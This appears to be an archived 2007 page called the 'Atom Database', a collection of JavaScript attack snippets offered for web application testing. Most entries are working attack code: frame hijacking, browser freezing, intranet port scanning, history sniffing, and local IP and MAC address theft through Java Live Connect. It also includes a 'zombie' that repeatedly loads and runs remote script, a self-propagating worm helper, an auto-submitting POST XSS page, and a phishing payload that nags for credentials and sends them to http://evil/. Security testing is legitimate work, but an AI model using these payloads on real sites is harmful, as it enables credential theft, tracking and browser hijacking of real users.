Atom Database

Sat, 20 Jan 2007 10:12:19 GMT

Atom is The smallest part of a substance which can exist and still retain the properties of the substance. All familiar matter consists of atoms. An atom consists of a positively charged nucleus and orbiting electrons. The simplest atom is hydrogen (one proton and one electron), and the largest atom in nature is uranium (92 protons, 92 electrons, and 146 neutrons). KU

The purpose of this project is to collect useful attack snippets, which can be employed when performing WEB Application Security testing.

pdppdp

Framejack

Hijack the current user browser window. This technique employs a single 100%x100% frame that sits on the top of the currently exploited remote content. When the user interacts with the browser window or tab the attacker persists state. This state is lost as soon as the user moves to another URL.

function framejack(url) {
	var ifr = document.createElement('iframe');
	ifr.src= url;

	document.body.scroll = 'no';
	document.body.appendChild(ifr);

	ifr.style.position = 'absolute';
	ifr.style.width = ifr.style.height = '100%';
	ifr.style.top = ifr.style.left = ifr.style.border = 0;
}

All Browsers, JavaScript, hijack, frame, persistency

pdppdp

getNetInfo

Retrieve network information. By using this function attackers can retrieve information about the local NATed IP address and host name. This information is highly sensitive since it enables attackers to conduct attacks on Intranet resources.

function getNetInfo() {
	var sock = new java.net.Socket();
	sock.bind(new java.net.InetSocketAddress('0.0.0.0', 0));
	sock.connect(new java.net.InetSocketAddress(document.domain, (!document.location.port)?80:document.location.port));
	return {domain: sock.getLocalAddress().getHostName(), ip: sock.getLocalAddress().getHostAddress()};	
}

Firefox, Opera, Live Connect, JavaScript, Information Gathering

pdppdp

Freeze

Freeze the browser for defined time. The time is in milliseconds. While frozen, users are unable to interact with the browser. Certain browsers may terminate the script if the time value is too high. Attackers can use this function to force the browser to wait until certain remote event occurs.

function freeze(time) {
	var date = new Date();
	var cur = null;
	
	do {
		cur = new Date();
	} while(cur - date < time);
}

All Browsers, JavaScript, freeze, DoS

pdppdp

googleAjaxSearch

Perform searches with Google from the browser. This technique can be employed by attackers in order to make self-propagating Ajax worms. The worms finds new targets via Google and uses your browser to attack.

function googleAjaxSearch(callback, query, key, context) {
	if (googleAjaxSearch.callbacks == undefined)
		googleAjaxSearch.callbacks = new Array();

	var key = (key == undefined)?'internal-documentation':key;
	var context = (context == undefined)?0:context;

	var script = document.createElement('script');
	script.defer = true;
	script.type = 'text/javascript';
	script.src = 'http://www.google.com/uds/GwebSearch?callback=googleAjaxSearch.callbacks.callback' + googleAjaxSearch.callbacks.length + '&context=' + context + '&lstkp=0&rsz=large&hl=en&q=' + query + '&key=' + key + '&v=0.1';
	
	googleAjaxSearch.callbacks['callback' + googleAjaxSearch.callbacks.length] = function (context, results, status) {
		document.body.removeChild(script);
		delete googleAjaxSearch.callbacks['callback' + googleAjaxSearch.callbacks.length];
		callback(results, query, key, context, status);
	};
	
	document.body.appendChild(script);
}

All Browsers, JavaScript, Google, search

pdppdp

portScan

Perform port scanning. This not the only way attackers can perform port scanning. You need to adjust the timeout value in order to achieve the most desired result. This technique can be quite inaccurate sometimes.

function portScan(callback, target, ports, timeout) {
	var timeout = (timeout == null)?100:timeout;

	for (index = 0; index < ports.length; index++)
 		new function () {
			var img = new Image();
			img.onload = img.onerror = function () {
				if (!img) return;
				img = undefined;
				callback(target, ports[index], true);
			};
			img.src = 'http://' + target + ':' + ports[index];

			window.setTimeout(function () {
				if (!img) return;
				img = undefined;
				callback(target, ports[index], false);
			}, timeout);
		};
}

All Browsers, JavaScript, portscan

pdppdp

getURLJ

Retrieve remote content by using Java Live Connect. This function is very suitable when a binary files is required to be downloaded. Works only on Live Connect browsers.

function getURLJ(url) {
	var data = null;
	var destination = new java.net.URL(url);
	var buffer = java.lang.reflect.Array.newInstance(java.lang.Byte.TYPE, 65536);
	var stream = destination.getContent();
	
	while (true) {
		var count = stream.read(buffer);
		
		if (count <= 0)
			break;
			
		var str = new java.lang.String(buffer, 0, count);
		data += str;
	}
	
	stream.close();
	return data;
}

Firefox, Opera, Live Connect, JavaScript

pdppdp

zombie

Attach a zombie. This function will perform queries to "url" on a regular basis (specified by interval). Retrieved data is evaluated as a JavaScript expressions.

function zombie(url, interval) {
	var interval = (interval == null)?2000:interval;

	setInterval(function () {
		var script = document.createElement('script');
		script.defer = true;
		script.type = 'text/javascript';
		script.src = url;
		document.body.appendChild(script);
	}, interval);
}

All Browsers, JavaScript, zombie

pdppdp

getDocument

Retrieve the document object in a cross-browser manner. This function is very useful when the attacker want to read the content of a particular iframe or frame.

function getDocument(target) {
	if (target == undefined)
		return document;
	else if (target.contentDocument)
		return target.contentDocument;
	else if (target.contentWindow)
		return target.contentWindow.document;
	else if (target.document)
		return target.document;
	else
		throw 'unable to get document object';
}

All Browsers, JavaScript, document, iframe

pdppdp

historyScan

Scan user history. This function enumerates the current user visited links by performing checks on their style.

function getDocument(target) {
	if (target == undefined)
		return document;
	else if (target.contentDocument)
		return target.contentDocument;
	else if (target.contentWindow)
		return target.contentWindow.document;
	else if (target.document)
		return target.document;
	else
		throw 'unable to get document object';
}

function historyScan(callback, URLs) {
	var iframe = document.createElement('iframe');
	iframe.style.visibility = 'hidden';
	document.body.appendChild(iframe);
	
	var doc = getDocument(iframe);
	doc.open();
	doc.write('<style>a:visited{display: none}</style>');
	doc.close();
	
	for (index = 0; index < URLs.length; index++) {
		var a = doc.createElement('a');
		a.href = URLs[index];
		doc.body.appendChild(a);
		
		if (a.currentStyle)
			var display = a.currentStyle['display'];
		else
			var display = doc.defaultView.getComputedStyle(a, null).getPropertyValue('display')
			
		callback(URLs[index], display == 'none'?true:false);
	}
	
	document.body.removeChild(iframe);
}

All Browsers, JavaScript, history, scan

pdppdp

b64encode

This function encodes a string in base64 format.

function b64encode(input) {
	var b64chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';

	var result = '';
	var chr1, chr2, chr3;
	var enc1, enc2, enc3, enc4;
	var i = 0;
	
	do {
		chr1 = input.charCodeAt(i++);
		chr2 = input.charCodeAt(i++);
		chr3 = input.charCodeAt(i++);
		
		enc1 = chr1 >> 2;
		enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
		enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
		enc4 = chr3 & 63;
		
		if (isNaN(chr2)) {
			enc3 = enc4 = 64;
		} else if (isNaN(chr3)) {
			enc4 = 64;
		}
		
		result += b64chars.charAt(enc1) + b64chars.charAt(enc2) + b64chars.charAt(enc3) + b64chars.charAt(enc4);
	} while (i < input.length);
	
	return result;
}

JavaScript, Cross-platformed, base64, Encodings

pdppdp

b64decode

This function decodes base64 strings.

function b64decode(input) {
	var b64chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';

	var result = '';
	var chr1, chr2, chr3;
	var enc1, enc2, enc3, enc4;
	var i = 0;

	var input = input.replace(/[^A-Za-z0-9\+\/\=]/g, '');

	do {
		enc1 = b64chars.indexOf(input.charAt(i++));
		enc2 = b64chars.indexOf(input.charAt(i++));
		enc3 = b64chars.indexOf(input.charAt(i++));
		enc4 = b64chars.indexOf(input.charAt(i++));

		chr1 = (enc1 << 2) | (enc2 >> 4);
		chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
		chr3 = ((enc3 & 3) << 6) | enc4;

		result += String.fromCharCode(chr1);

		if (enc3 != 64)
			result += String.fromCharCode(chr2);

		if (enc4 != 64)
			result += String.fromCharCode(chr3);
	} while (i < input.length);
	
	return result;
}

JavaScript, Cross-platformed, base64, Encodings

kuza55kuza55

Firefox B64 Functions

These functions are part of the javascript window object in the Gecko engine.

alert (btoa("test"));
alert (atob("dGVzdA=="));

JavaScript, Firefox, base64, Encodings

pdppdp

include

Load a remote script file. This function is non-blocking which means that you have to wait for the script to load before using its declarations.

function include(url) {
	document.write('<' + 'script src="' + url + '" language="javascript" type="text/javascript"' + '>' + '<' + '/script' + '>');
}

JavaScript, All Browsers, include, modules

pdppdp

include

Load a remote script file. This function is non-blocking which means that you have to wait for the script to load before using its declarations. For that reason you may want to use the onload callback function.

function include(url, onload) {
	var script = document.createElement('script');
	script.type = 'text/javascript';
	script.onload = onload;
	script.src = url;
	document.body.appendChild(script);
}

Mozilla, Firefox, Opera, include, modules

pdppdp

forcefocus

This function can be used to force the focus on a particular element from the current dom.

function forcefocus(target, timeout) {
	var timeout = (timeout == undefined) ? 500 : timeout;

	target.focus();

	setTimeout(function () {
		forcefocus(target);
	}, timeout);
}

All Browsers, focus

pdppdp

walkJSON

This function walk the entire JSON (the j parameter) tree. The c parameter is the function that handles walked nodes.
function walkJSON(j, c) {
    if (typeof(c) != 'function') {
        return;
    }

    for (var i in j) {
        c(i, j[i]);

        if (j[i] instanceof Array || typeof(j[i]) == 'object') {
            arguments.callee(j[i], c);
        }
    }
}
universal
pdppdp

parseURL

This function parse the URL into an object.
function parseURL(url) {
	var REGEX = /^((\w+):\/\/)?((\w+):?(\w+)[email protected])?([^\/\?:]+):?(\d+)?(\/?[^\?#]+)?\??([^#]+)?#?(\w*)/;
	
	var fields = {'href': 0, 'username' : 4, 'password' : 5, 'port' : 7, 'protocol' : 2, 'host' : 6, 'hostname' : 6, 'pathname' : 8, 'search' : 9, 'hash' : 10};
	var result = new Object();
	var r = REGEX.exec(url);
	
	for (var field in fields) {
		result[field] = r[fields[field]];
	}
	
	result.hash = result.hash?'#' + result.hash:'#';
	result.search = result.search?'?' + result.search:'?';
	result.username = result.username?result.username:'';
	result.password = result.password?result.password:'';
	
	if (result.port == undefined) {
		switch (result.protocol) {
			case 'http':
				result.port = 80;
				break;
			case 'https':
				result.port = 443;
				break;
			case 'ftp':
				result.port = 21;
				break;
			default:
				result.port = '';
				break;
		}
	}
	
	return result;
}
universal
Adrian PastorAdrian Pastor

STICKY PHISHING

This payload launches a phishing attack to the user. It's sticky cuz it won't stop prompting the victim to enter his username and password until he enters both. Once obtained they are forwarded to a third-party site. Ideal for persistent XSS attacks.
do{a=prompt("APP_OR_SITE_NAME: an error has ocurred\nPlease enter your USERNAME","");b=prompt("APP_OR_SITE_NAME: an error has ocurred\nPlease enter your PASSWORD","");} while(a==null || b==null || a=="" || b=="");alert("owned!:"+a+"/"+b);window.location="http://evil/?u="+a+"&p="+b
JavaScript, Universal, Password Theft
Adrian PastorAdrian Pastor

POST METHOD XSS

Attack HTML page for XSS vuls that can only be exploited as a POST request (as opposed to GET)
<html>
<!-- this page would be hosted on the attacker's site and the victim would need to be tricked into visiting it -->
<form method="post" action="http://target/vulnerable.jsp">
<input type="text" name="param" value='<script>alert("XSS")</script>'>
</form>
<script>document.forms[0].submit();</script>
</html>
Universal, HTML, JavaScript
yUnwEbyUnwEb

MAC ADDRESS

You can steal the user's MAC address with Java 1.6. For Internet Explorer you can use an applet. This information is very sensitive, because the MAC address is a unique identifier. Although it can be easily changed by the user, it can be useful to identify some users with dynamic IP address or using proxies.
function get_mac() {
    try {
        var ifaces = java.net.NetworkInterface.getNetworkInterfaces()
        var ifaces_list = java.util.Collections.list(ifaces);
        for (var i = 0; i < ifaces_list.size(); i++) {
            var mac = ifaces_list.get(i).getHardwareAddress();
            if (mac) {
                return mac;
            }
        }
    } catch (e) { }
    return false;
}
Firefox, Opera, Live Connect, Java SE 6, JavaScript, Information Gathering